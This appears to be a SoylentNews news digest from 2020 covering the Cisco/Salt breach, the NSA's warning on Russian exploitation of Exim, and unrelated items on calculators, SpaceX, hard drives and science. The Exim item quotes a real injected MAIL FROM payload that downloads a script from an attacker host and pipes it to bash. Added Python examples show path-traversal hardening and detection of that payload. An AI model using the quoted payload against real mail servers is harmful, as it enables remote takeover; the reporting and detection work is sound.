Cisco security breach hits corporate servers that ran unpatched software:
Six servers Cisco uses to provide a virtual networking service were compromised by hackers who exploited critical flaws contained in unpatched versions the open source software service relies on, the company disclosed on Thursday.
The May 7 compromise hit six Cisco servers that provide backend connectivity to the Virtual Internet Routing Lab Personal Edition (VIRL-PE), a Cisco service that lets customers design and test network topologies without having to deploy actual equipment. Both the VIRL-PE and a related service, Cisco Modeling Labs Corporate Edition, incorporate the Salt management framework, which contained a pair of bugs that, when combined, was critical. The vulnerabilities became public on April 30.
[...] Cisco said that without updates, any VIRL-PE or CML products that are deployed in standalone or cluster configurations will remain vulnerable to the same sorts of compromises. The company released software updates for the two vulnerable products. Cisco rated the severity of the vulnerabilities with a ranking of 10 out of 10 on the CVSS scale.
The Salt vulnerabilities are CVE-2020-11651, an authentication bypass, and CVE-2020-11652, a directory traversal. Together, they allow unauthorized access to the entire file system of the master salt server that services using Salt rely on. F-Secure, the firm that discovered the vulnerabilities, has a good description of them here.
Salt is described as "Software to automate the management and configuration of any infrastructure or application at scale."
Additional Info: https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/
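The directory-traversal half of the pair above is the generic mistake of joining a caller-supplied path onto a served root and trusting the result. The following is an added illustration, not Cisco's or Salt's own code: it puts the weak join beside a hardened one that resolves the path and refuses anything that lands outside the root. The root directory name and the sample requests are constructed for the example.

```python
import os

# Constructed example root; the directory name is an assumption for illustration
# and is not Salt's own file-server layout.
ROOT = "/srv/files"


def naive_join(root, requested):
    """The weak pattern: trust the caller-supplied path and join it onto the root.

    os.path.join discards the root when `requested` is absolute, and normpath
    happily collapses '..' segments, so both forms walk out of the root.
    """
    return os.path.normpath(os.path.join(root, requested))


def resolve_under_root(root, requested):
    """Resolve `requested` relative to `root` and return the absolute path only
    if it is still inside the root; return None otherwise.

    Leading separators are stripped so an absolute request is treated as
    relative to the root instead of replacing it; realpath also follows
    symlinks, so a link planted inside the root that points outside is caught.
    """
    root_abs = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_abs, requested.lstrip("/")))
    if os.path.commonpath([root_abs, candidate]) != root_abs:
        return None
    return candidate


def is_within_root(root, requested):
    """Boolean form of the containment check, convenient for tests and logging."""
    return resolve_under_root(root, requested) is not None


def safe_join(root, requested):
    """Hardened pattern: refuse any request that resolves outside the root."""
    resolved = resolve_under_root(root, requested)
    if resolved is None:
        raise ValueError(f"path escapes root: {requested!r}")
    return resolved


if __name__ == "__main__":
    # A few constructed requests, showing how each pattern treats them.
    for req in ["pillar/top.sls", "../../etc/passwd", "/etc/passwd", "a/../../b"]:
        verdict = "accepted" if is_within_root(ROOT, req) else "rejected"
        print(f"{req!r:22} naive -> {naive_join(ROOT, req):28} safe -> {verdict}")
```

The containment test uses os.path.commonpath on the resolved paths rather than a string prefix check, so a sibling directory such as /srv/files2 cannot pass as being under /srv/files.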
Previously:
(2020-05-04) Recent Salt Vulnerabilities Exploited to Hack LineageOS, Ghost, DigiCert Servers
Don't Update Your TI-83 or TI-84 Calculator's Firmware:
It's weird to think about using a calculator in 2020, when just about everyone has a smartphone or laptop within reach, but Texas Instruments' calculators are still a popular (and often required) resource for students. The latest calculators are even capable of installing and running simple applications, which makes them an excellent learning tool for coders and hardware modders. (I even modded my TI calculator to run respectable facsimiles of Doom and Super Mario back in college.)
Unfortunately, Texas Instruments is removing support of the C assembly coding language in a new firmware update to crack down on cheating. And that means a lot of homebrew programs are either going to go away entirely or have to be converted to a much slower Python version—if that's even plausible.
The update affects the TI-84 Plus CE, TI-83 Plus CE-T, and the TI-83 Premium CE calculators. Texas Instruments says it's implementing the change to stop students from installing third-party software that circumvents the "exam mode" limitation on certain TI devices. Exam mode is designed to restrict certain functionality so students can complete their work without the help of extra features—cheating, basically.
[...] That said, TI-83 and TI-84 calculator firmware must be manually downloaded to your PC and updated over USB, so users who want to remain on the older version can do so by simply not installing the new firmware—but that's your only option.
What was the most interesting thing you created that ran on a calculator?
See also: TI removes access to assembly programs on the TI-83 Premium CE
[20200530_203823 UTC: UPDATE: Launch was successful, all systems nominal, first stage successfully landed on the drone ship "Of Course I Still Love You", and Ben and Doug are on their 19-hour flight to the ISS (International Space Station). Live coverage continues all the way through docking.]
Today's the day—weather permitting, America is returning to space:
During Wednesday's technically smooth countdown, NASA astronauts Doug Hurley and Bob Behnken came within 17 minutes of launching before a scrub due to poor weather. Now the crew will suit up and try again on Saturday despite still iffy weather.
SpaceX is working toward an instantaneous launch at 3:22pm ET (19:22 UTC). The big concern again today is the development of thunderstorms near the launch site this afternoon, which could violate a number of weather criteria, including not just precipitation, but also residual electric energy from lighting in the atmosphere. Overall, the chance of acceptable weather at launch time is about 50 percent, forecasters estimate. They are also watching for down-range conditions in case an emergency abort is required during the rocket's ascent to space.
This is nothing new for NASA or U.S. human spaceflight. As the commander, Hurley, noted on Twitter Friday, his first space mission in 2009 scrubbed five times for weather or technical issues before it finally lifted off. "All launch commit criteria is developed way ahead of any attempt," Hurley said. "This makes the correct scrub or launch decision easier in the heat of the moment."
It has been such a long, long road for NASA and SpaceX to reach this moment—thousands of engineers and technicians have labored to design, develop, test, and fly hardware for the Dragon spacecraft and Falcon 9 rocket over the last decade. But now the hardware and crew are ready, and at just the right time, to go fly.
[...] A combined NASA and SpaceX webcast will begin today at 11am ET (15:00 UTC).
Launch is scheduled for exactly 2 hours from the time this story goes live.
You can also join the discussion on channel #Soylent on IRC (Internet Relay Chat).
Link to the YouTube Live Stream.
National Weather Service Current Conditions and Forecast and Hourly Forecast Graph.
Interactive, real-time lightning map
Twitter feeds for NASA, SpaceX and Elon Musk.
Recently:
(2020-05-27) SpaceX to Launch Crew Demo 2; Weather Causes Today's Launch to be Scrubbed; Try Again Sat.
(2020-05-27) SpaceX Crew Dragon Demo-2 Launch Timeline
(2020-05-26) Spacex - Crew Dragon Demo 2 Launch - 2020-05-27 20:33 UTC (16:33 EDT)
(2020-05-13) SpaceX Crew Dragon Simulator Challenges You to Dock with the ISS, and It's Not Easy
The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists.
The American surveillance super-agency said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June.
Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerable server to hijack it – we've censored parts of it to avoid tripping any filters:
MAIL FROM:${run{\x2Fbin\x2Fsh\t- c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be
That hexadecimal decodes to:
/bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"
"The Russian actors, part of the General Staff Main Intelligence Directorate's (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker's dream access – as long as that network is using an unpatched version of Exim MTA," the NSA said.
In this case, miscreants, linked to the military-backed Sandworm operation, exploit improper validation of the recipient's address in Exim's deliver_message() function in /src/deliver.c to inject and execute a shell command, which downloads and runs another script to commandeer the server. An in-depth technical description of the programming blunder can be found here by Qualys, which found and reported the flaw last year.
Because Exim is widely used on millions of Linux and Unix servers for mail, bugs in the MTA are by nature public-facing and pose an attractive target for hackers of all nations.
The NSA did not say who exactly was being targeted, though we can imagine the Russian military takes an interest in probing foreign government agencies and vital industries. GRU hackers have also previously targeted energy utilities, by some reports.
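The sample above is recognisable by its shape: Exim's string expander treats `${run{...}}` as a command-execution item, and the `\xNN` escapes are how the command is smuggled past naive address checks. The following detection routine is an added example, not code from the NSA, The Register or the Exim project: it scans SMTP envelope commands, decodes the escapes and reports any line carrying a `${run{` item, whether it appears raw or only after decoding. The sample lines are constructed, with harmless decoded commands, rather than captured traffic.

```python
import re

# Constructed sample SMTP command lines (not captured traffic). The second and
# third carry the ${run{...}} expansion shape; the decoded commands are harmless.
SAMPLE_LINES = [
    "MAIL FROM:<alice@example.com>",
    "MAIL FROM:<${run{\\x2Fbin\\x2Ftrue}}@example.invalid>",
    "RCPT TO:<${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22id\\x22}}@localhost>",
    "RCPT TO:<bob@example.com>",
]

# \xNN, \t and \n escapes as Exim's string expander understands them
ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{2})|(t)|(n))")
# the command-execution expansion item; whitespace between tokens is tolerated
RUN_ITEM = re.compile(r"\$\{\s*run\s*\{")
# only envelope commands carry addresses that reach the expander
ENVELOPE = re.compile(r"^(MAIL FROM|RCPT TO):", re.IGNORECASE)


def _unescape(match):
    if match.group(1):
        return chr(int(match.group(1), 16))
    return "\t" if match.group(2) else "\n"


def decode_escapes(text):
    """Replace every \\xNN, \\t and \\n escape with the character it names."""
    return ESCAPE.sub(_unescape, text)


def find_run_expansions(lines):
    """Return (line_no, decoded_line) for every envelope command that contains a
    ${run{ item, checking the raw text and the decoded text so that escapes
    cannot hide the item from the scan."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        if not ENVELOPE.match(line):
            continue
        decoded = decode_escapes(line)
        if RUN_ITEM.search(line) or RUN_ITEM.search(decoded):
            hits.append((line_no, decoded))
    return hits


if __name__ == "__main__":
    for line_no, decoded in find_run_expansions(SAMPLE_LINES):
        print(f"line {line_no}: {decoded}")
```

A hit on a server that is already patched is still worth an alert: the same payload shape shows which hosts are being probed, and the decoded command tells you what would have been fetched and run.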
Previously: 400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks
Western Digital gets sued for sneaking SMR disks into its NAS channel
All three of the surviving conventional hard drive vendors—Toshiba, Western Digital, and Seagate—have gotten caught sneaking disks featuring Shingled Magnetic Recording technology into unexpected places recently. But Western Digital has been the most brazen of the three, and it's been singled out for a class action lawsuit in response.
Although all three major manufacturers quietly added SMR disks to their desktop hard drive line-up, Western Digital is the only one so far to slip them into its NAS (Network Attached Storage) stack. NAS drives are expected to perform well in RAID and other multiple disk arrays, whether ZFS pools or consumer devices like Synology or Netgear NAS appliances.
In sharp contrast to Western Digital's position on SMR disks as NAS, Seagate executive Greg Belloni told us that there weren't any SMR disks in the Ironwolf (competitor to Western Digital Red) line-up now and that the technology is not appropriate for that purpose.
[...] Hattis Law has initiated a class action lawsuit against Western Digital, accordingly. The lawsuit alleges both that the SMR technology in the newer Western Digital Red drives is inappropriate for the marketed purpose of the drives and that Western Digital deliberately "deceived and harm[ed] consumers" in the course of doing so.
Previously: AnandTech Interview With Seagate's CTO: New HDD Technologies Coming
Western Digital: Over Half of Data Center HDDs Will Use SMR by 2023
Seagate Caught Using SMR in Barracuda Compute and Desktop Drives
On 2020-05-28 the SoylentNews community attained an amazing milestone: the posting of its one millionth comment!
First off, please accept my sincere thanks and gratitude to the community for all your contributions to the site to get us to this point. Never did I imagine in those first few days when comment IDs were 3 or 4 digits long that such a milestone was even feasible! I mean the site was crashing several times a day. Not an auspicious start, that's for sure! But we all pulled together, weathered some challenges, and got things pulled together... and we're still here!
So, who was the lucky poster of comment 1,000,000? And who was the runner-up at comment 999,999 (which has a nice palindromic ring to it, wouldn't you agree?)
The honor of the very first 7-digit comment fittingly goes to story-submitter extraordinaire takyon. Yes, not content to post comment ID 1000000 because that could be just a one-shot lucky break. No, he has posted (as of this writing) 18,731 comments. Oh, and as for submitting stories, he is unfortunately omitted from the "Most Active Authors" list on the SoylentNews Hall of Fame because he is also an editor. So, please join me in thanking takyon for submitting 5,852 stories! Oh! And as an editor, he has also pushed out 1,350 stories! Whenever I see one of his subs in the queue, I know it only needs a quick review before pushing it out to the story queue. He makes my job as an editor much easier and makes SoylentNews look good! Thanks takyon!
So who was our runner-up with comment number 999,999? Well, he wasn't just spinning his tires when he posted this comment. None other than our also-prolific Runaway1956! He is no slouch when it comes to posting comments, either, as he has posted 18,483 of them so far. He has taken an active part in comment moderation, too, with 2,968 moderations of which 78% were upmods. As if that were not enough, he is also an active contributor to our Folding@Home team, sitting currently at 3rd place and making a hard run for 2nd place! (F@H investigates — via computer modelling — how proteins fold.) The F@H group's efforts have almost exclusively been redirected to understanding the SARS-CoV-2 virus which causes COVID-19 disease.
For those who may be unaware, SoylentNews is purely a volunteer organization. Nobody has ever been paid even one cent for their work. Further, we have never accepted any advertising on SoylentNews; the site is entirely self-supporting through the subscriptions of the community. We run a tight ship and expenses run approximately $20 per day for everything.
Speaking of volunteers, it brings me great pleasure to call out another major milestone, fnord666 has now edited over 5,000 stories on SoylentNews! (See Most Active Authors.) Thanks so very much, fnord666, for all your hard work and sacrifices to make that happen!
Thanks everybody! Here's to many more years!
When lockdown measures were announced in France and other countries, secondary-school teachers and university professors had to quickly make the transition from classroom teaching to remote education. As a result, practical work was often abandoned—experiments were no longer possible without a lab, test tubes, oscilloscopes and other equipment.
To overcome this problem, some educators used digital simulations, while others analysed existing data. But people familiar with experimental science know that simulations and simple analysis do not replace the lab bench and real experiments. The role of science is to help us to understand everyday phenomena and "real" experiments are absolutely essential.
As academics working in the field of physics, we have been reflecting about developing new forms of practical work that allows for greater student autonomy for several years now. At Université de Bordeaux and Paris-Saclay, we asked our students to create their own experiment, and in some cases, to conduct them independently with smartphones or Arduino boards, an open-source solution for experiments with electronics.
Lockdown was a great chance to test autonomous practical work, so we jumped on it immediately. During the two months of French lockdown—it began on March 17 and ended May 11—we adapted and continued to teach using experiments without compromising the quality of content. These "life-size" tests convinced us that it is possible to remotely conduct lessons with experiments for both secondary-school teachers and higher-education professors. We have even observed very positive aspects of this new approach. It changes the student's relationship with science and with their teachers.
Professor Felix Hoenikker did fine with bits of string and children's toys when he developed Ice-nine, so why can't we?
World's oldest bug is fossil millipede from Scotland:
A 425-million-year-old millipede fossil from the Scottish island of Kerrera is the world's oldest "bug"—older than any known fossil of an insect, arachnid or other related creepy-crawly, according to researchers at The University of Texas at Austin.
The findings offer new evidence about the origin and evolution of bugs and plants, suggesting that they evolved much more rapidly than some scientists believe, going from lake-hugging communities to complex forest ecosystems in just 40 million years.
[...] The team found that the ancient millipede fossil is 425 million years old, or about 75 million years younger than the age other scientists have estimated the oldest millipede to be using a technique known as molecular clock dating, which is based on DNA's mutation rate. Other research using fossil dating found that the oldest fossil of a land-dwelling, stemmed plant (also from Scotland) is 425 million years old and 75 million years younger than molecular clock estimates.
Journal Reference:
M. E. Brookfield et al. Myriapod divergence times differ between molecular clock and fossil evidence: U/Pb zircon ages of the earliest fossil millipede-bearing sediments and their significance, Historical Biology (DOI: 10.1080/08912963.2020.1761351)
For all those legs it couldn't move fast enough to avoid turning to stone.
CNet:
First came VR. Then came a wave of AR headsets that were high-priced and full of promises of wild mixed reality worlds. Apple now seems to be readying its own pair of smart glasses, at long last, seven years after Google Glass and four years after the debut of Oculus Rift. These reports have extended back for several years, including a story broken by CNET's Shara Tibken in 2018.
Apple has been in the wings all this time without any headset at all, although the company's aspirations in AR have been clear and well-telegraphed on iPhones and iPads for years. Each year, Apple's made significant strides on iOS with its AR tools.
The article dives into these topics at some depth:
Will Apple Glass succeed where Google Glass failed?
Can interactive technology ease urban traffic jams?:
Traffic congestion is a serious problem in the United States, but a new analysis shows that interactive technology -- ranging from 511 traffic information systems and roadside cameras to traffic apps like Waze and Google Maps -- is helping in cities that use it.
Potentially, the researchers said, technology could limit the need to widen and expand roadways while saving commuters time and money and lessening environmental damage.
[...] Pavlou [author of the report] said the study suggests alternatives to simply building more and bigger roads to keep up with population and traffic growth. Using large-scale technology systems in conjunction with real-time traffic apps at the individual level is less expensive and more effective than only spending funds to expand and maintain roadways, he said.
Journal Reference:
Zhi (Aaron) Cheng, Min-Seok Pang, Paul A. Pavlou. Mitigating Traffic Congestion: The Role of Intelligent Transportation Systems, Information Systems Research (DOI: sre20190894)
The real question is, when cars honk does Pavlou's mouth water?
Technology uses plant biomass waste for self-powered biomedical devices:
An innovation turning waste material into stretchable devices may soon provide a new option for creating self-powered biomedical inventions.
A team from Purdue University used lignin to create triboelectric[*] nanogenerators. TENGs help conserve mechanical energy and turn it into power. Lignin is a waste byproduct from the pulp and paper industries, and it is one of the most abundant biopolymers on Earth.
[...] Wu said the lignin-based triboelectric devices also could function as self-powered sensors to detect and monitor the mechanical activities from the human body in applications such as health monitoring, human-machine interface, teleoperated robotics, consumer electronics and virtual and augmented reality technologies.
Journal Reference:
Yukai Bao, Ruoxing Wang, Yunmei Lu, Wenzhuo Wu. Lignin biopolymer based triboelectric nanogenerators [open], APL Materials (DOI: 015794APM)
[*] Triboelectric effect.
One man's kitchen scraps are another man's cyber-machines.
BBC:
Drones are expected to play a role in coastguard search and rescue (SAR) operations in the near future.
The [UK's] Maritime and Coastguard Agency (MCA) wants to make greater use of the technology as part of a new SAR contract to be awarded in 2024.
The contract also covers the continued provision of rescue helicopters, including those based in Scotland, and search planes.
[...] The coastguard said unmanned aircraft could potentially visit rescue sites ahead of air, sea or land-based recovery teams.
Images and other information gathered by drones could help develop the emergency services response to a situation.
How long before terrestrial drones follow their airborne brethren into service?
Data Breach at Bank of America:
Bank of America Corporation has disclosed a data breach affecting clients who have applied for the Paycheck Protection Program (PPP).
Client information was exposed on April 22 when the bank uploaded PPP applicants' details onto the US Small Business Administration's test platform. The platform was designed to give lenders the opportunity to test the PPP submissions before the second round of applications kicked off.
The breach was revealed in a filing made by Bank of America with the California Attorney General's Office. As a result of the incident, other SBA-authorized lenders and their vendors were able to view clients' information.
Data exposed in the breach consisted of details relating not only to individual businesses, but also to their owners. Compromised data may have included the business address and tax identification number along with the owner's name, address, Social Security number, phone number, email address, and citizenship status.
[...] In a breach notification document, a spokesperson for the bank said: "There is no indication that your information was viewed or misused by these lenders or their vendors. And your information was not visible to other business clients applying for loans, or to the public, at any time."
[...] Bank of America is offering clients affected by the breach free two-year membership of Experian's identity theft protection program.
Disclaimer: SoylentNews PBC has an account with Bank of America, but has not made an application to the PPP. In fact, since all SoylentNews staff are volunteers and have never been paid for their services, there was never any need or reason to apply for PPP.
Astronomers have captured an image of a super-rare type of galaxy—described as a "cosmic ring of fire"—as it existed 11 billion years ago.
The galaxy, which has roughly the mass of the Milky Way, is circular with a hole in the middle, rather like a titanic doughnut. Its discovery, announced in the journal Nature Astronomy, is set to shake up theories about the earliest formation of galactic structures and how they evolve.
"It is a very curious object that we've never seen before," said lead researcher Dr. Tiantian Yuan, from Australia's ARC Centre of Excellence for All Sky Astrophysics in 3 Dimensions (ASTRO 3-D). "It looks strange and familiar at the same time."
The galaxy, named R5519, is 11 billion light-years from the Solar System. The hole at its centre is truly massive, with a diameter two billion times longer than the distance between the Earth and the Sun. To put it another way, it is three million times bigger than the diameter of the supermassive black hole in the galaxy Messier 87, which in 2019 became the first ever to be directly imaged.
"It is making stars at a rate 50 times greater than the Milky Way," said Dr. Yuan, who is an ASTRO 3-D Fellow based at the Centre for Astrophysics and Supercomputing at Swinburne University of Technology, in the state of Victoria.
"Most of that activity is taking place on its ring—so it truly is a ring of fire."
Journal Reference:
Tiantian Yuan, Ahmed Elagali, Ivo Labbé, et al. A giant galaxy in the young Universe with a massive ring, Nature Astronomy (DOI: 10.1038/s41550-020-1102-7)
Leaked draft details Trump's likely attack on technology giants:
The Trump Administration is putting the final touches on a sweeping executive order designed to punish online platforms for perceived anti-conservative bias. Legal scholar Kate Klonick obtained a draft of the document and posted it online late Wednesday night.
[...] The document claims that online platforms have been "flagging content as inappropriate even though it does not violate any stated terms of service, making unannounced and unexplained changes to policies that have the effect of disfavoring certain viewpoints, and deleting content and entire accounts with no warning, no rationale, and no recourse."
The order then lays out several specific policy initiatives that will purportedly promote "free and open debate on the Internet."
First up is Section 230 of the Communications Decency Act.
[...] Trump's draft executive order would ask the Federal Communications Commission to clarify Section 230—specifically a provision shielding companies from liability when they remove objectionable content.
[...] Next, the executive order directs federal agencies to review their ad spending to ensure that no ad dollars go to online platforms that "violate free speech principles."
Another provision asks the Federal Trade Commission to examine whether online platforms are restricting speech "in ways that do not align with those entities' public representations about those practices"—in other words, whether the companies' actual content moderation practices are consistent with their terms of service. The executive order suggests that an inconsistency between policy and practice could constitute an "unfair and deceptive practice" under consumer protection laws.
Trump would also ask the FTC to consider whether large online platforms like Facebook and Twitter have become so big that they've effectively become "the modern public square"—and hence governed by the First Amendment.
[...] Finally, the order directs US Attorney General William Barr to organize a working group of state attorneys general to consider whether online platforms' policies violated state consumer protection laws.
[Ed Note - The following links have been added]
Follow Up Article: Trump is desperate to punish Big Tech but has no good way to do it
The Executive Order: Executive Order on Preventing Online Censorship